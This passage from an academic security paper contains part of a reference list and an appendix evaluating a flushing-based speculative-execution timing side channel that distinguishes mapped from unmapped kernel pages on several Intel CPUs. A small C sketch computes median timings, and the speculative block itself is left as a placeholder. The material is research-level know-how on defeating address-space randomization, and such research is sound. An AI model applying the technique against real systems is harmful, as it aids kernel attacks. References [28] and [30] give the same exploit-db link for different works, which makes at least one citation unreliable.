[19] Y. Jang, S. Lee, and T. Kim, "Breaking kernel address space layout randomization with Intel TSX," in Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security. ACM, 2016, pp. 380–392.

[20] V. P. Kemerlis, M. Polychronakis, and A. D. Keromytis, "ret2dir: Rethinking kernel isolation," in USENIX Security Symposium, 2014, pp. 957–972.

[21] C. Kil, J. Jun, C. Bookholt, J. Xu, and P. Ning, "Address Space Layout Permutation (ASLP): Towards fine-grained randomization of commodity software," in Proceedings of the 22nd Annual Computer Security Applications Conference (ACSAC '06), Washington, DC, 2006. [Online]. Available: http://dx.doi.org/10.1109/ACSAC.2006.9

[22] P. Kocher, D. Genkin, D. Gruss, W. Haas, M. Hamburg, M. Lipp, S. Mangard, T. Prescher, M. Schwarz, and Y. Yarom, "Spectre attacks: Exploiting speculative execution," ArXiv e-prints, Jan. 2018.

[23] P. Koppe, B. Kollenda, M. Fyrbiak, C. Kison, R. Gawlik, C. Paar, and T. Holz, "Reverse engineering x86 processor microcode," in 26th USENIX Security Symposium (USENIX Security 17). Vancouver, BC: USENIX Association, 2017, pp. 1163–1180. [Online]. Available: https://www.usenix.org/conference/usenixsecurity17/technical-sessions/presentation/koppe

[24] A. Kurmus and R. Zippel, "A tale of two kernels: Towards ending kernel hardening wars with split kernel," in Proceedings of the 2014 ACM SIGSAC Conference on Computer and Communications Security. ACM, 2014, pp. 1366–1377.

[25] M. Lipp, M. Schwarz, D. Gruss, T. Prescher, W. Haas, S. Mangard, P. Kocher, D. Genkin, Y. Yarom, and M. Hamburg, "Meltdown," ArXiv e-prints, Jan. 2018.

[26] F. Liu, Y. Yarom, Q. Ge, G. Heiser, and R. B. Lee, "Last-level cache side-channel attacks are practical," in Security and Privacy (SP), 2015 IEEE Symposium on. IEEE, 2015, pp. 605–622.

[27] S. Manne, A. Klauser, and D. Grunwald, "Pipeline gating: Speculation control for energy reduction," ACM SIGARCH Computer Architecture News, vol. 26, no. 3. IEEE Computer Society, 1998, pp. 132–141.

[28] P. Oester, "Dirty COW." [Online]. Available: https://www.exploit-db.com/exploits/40611/

[29] V. Pappas, M. Polychronakis, and A. D. Keromytis, "Smashing the Gadgets: Hindering return-oriented programming using in-place code randomization," in Proceedings of the 2012 IEEE Symposium on Security and Privacy (SP '12), Washington, DC, USA, 2012. [Online]. Available: http://dx.doi.org/10.1109/SP.2012.41

[30] Google Security Research, "Rowhammer Privilege Escalation." [Online]. Available: https://www.exploit-db.com/exploits/40611/

[31] T. Ristenpart, E. Tromer, H. Shacham, and S. Savage, "Hey, you, get off of my cloud: Exploring information leakage in third-party compute clouds," in Proceedings of the 16th ACM Conference on Computer and Communications Security. ACM, 2009, pp. 199–212.

[32] W. Song, H. Choi, J. Kim, E. Kim, Y. Kim, and J. Kim, "PIkit: A new kernel-independent processor-interconnect rootkit," in USENIX Security Symposium, 2016, pp. 37–51.

[33] PaX Team, "Address Space Layout Randomization (ASLR)." [Online]. Available: http://pax.grsecurity.net/docs/aslr.txt

[34] E. Tromer, D. A. Osvik, and A. Shamir, "Efficient cache attacks on AES, and countermeasures," Journal of Cryptology, vol. 23, no. 1, pp. 37–71, 2010.

[35] R. Wartell, V. Mohan, K. W. Hamlen, and Z. Lin, "Binary stirring: Self-randomizing instruction addresses of legacy x86 binary code," in Proceedings of the 2012 ACM Conference on Computer and Communications Security (CCS '12). New York, NY, USA: ACM, 2012, pp. 157–168. [Online]. Available: http://doi.acm.org/10.1145/2382196.2382216

[36] Y. Yarom and K. Falkner, "Flush+Reload: A high resolution, low noise, L3 cache side-channel attack," in USENIX Security Symposium, 2014, pp. 719–732.

[37] T.-Y. Yeh and Y. N. Patt, "Alternative implementations of two-level adaptive branch prediction," ACM SIGARCH Computer Architecture News, vol. 20, no. 2. ACM, 1992, pp. 124–134.

[38] Y. Zhang, A. Juels, M. K. Reiter, and T. Ristenpart, "Cross-VM side channels and their use to extract private keys," in Proceedings of the 2012 ACM Conference on Computer and Communications Security. ACM, 2012, pp. 305–316.

IX. APPENDIX

[Figure 3: box plots of the flushing-based timing measurements, comparing "Mapped" vs. "Not Mapped" pages for (a) Skylake, (b) Haswell, (c) Sandy Bridge, (d) Nehalem, and (e) Prescott.]

Fig. 3: Results of the flushing side channel. If left (mapped) and right (not mapped) deviate, feedback is reliable.

A. Flushing-Based Side Channel Analysis

This section details the evaluation results of our flushing-based side channel. In Section V, we measured and compared the minimum number of cycles for cache accesses. We cannot directly apply the same methodology to the execution time side channel. First, we cannot wrap our timing measurements in two serializing instructions such as cpuid, as this would allow the sequence of imul instructions to complete—avoiding speculation. Therefore, we removed the first call to cpuid and included the entire speculative execution block in our measurements (instead of the access to a single memory address).

Second, we found that the flushing execution time differs significantly between repeated executions, frequently not showing any difference in the condition (e.g., page mapped or not). This implies that the minimum execution time among several (again, we used 1000) executions cannot be used to leak a condition; instead, we have to inspect the value distributions, averages, or median values.

To allow for a fair comparison between the feedback channels, we provide the flushing-based feedback measurement results for all architectures in Figure 3. For two architectures, Prescott and Skylake, there is no significant measurable timing difference between the page being mapped or not. We believe that Prescott fails for the same reason as for the other feedback channels. But also Skylake, the most recent architecture in our measurements, does not yield a measurable difference in our concrete instantiation of instruction flushing. While improved side channels of similar methodology (e.g., using instructions other than hlt) might still exist, this indicates that recent Intel CPUs have more stable execution times regardless of speculation.

The other three architectures, however, show significant differences that can reliably be confirmed when repeating the experiment. To our surprise, the results were not as coherent as expected. Haswell (Figure 3b) and Nehalem (Figure 3d), on average, showed faster executions for mapped pages. In contrast, Sandy Bridge (Figure 3c) slows down executions (median) when accessing mapped pages. We cannot explain this deviation in detail, but speculate that the inner workings of the CPU's pipeline engine and its different branch prediction rollback algorithms lead to this characteristic behavior.
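Since minima are uninformative here, a distribution-level comparison is needed. The following sketch shows one way to implement the median comparison described above; it is our own illustration, and measure_spec_block() is a placeholder for timing the entire speculative execution block, which is not reproduced here.

#include <stdint.h>
#include <stdlib.h>

#define RUNS 1000   /* number of executions, as in our experiments */

/* Placeholder: one timing of the entire speculative execution block
   (branch, speculated code, rollback) for probe address `addr`. */
extern uint64_t measure_spec_block(uint64_t addr);

static int cmp_u64(const void *a, const void *b)
{
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Collect RUNS samples and return the median; comparing medians for a
   mapped vs. a non-mapped probe address reveals the condition. */
static uint64_t median_timing(uint64_t addr)
{
    uint64_t samples[RUNS];
    for (int i = 0; i < RUNS; i++)
        samples[i] = measure_spec_block(addr);
    qsort(samples, RUNS, sizeof(samples[0]), cmp_u64);
    return samples[RUNS / 2];
}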
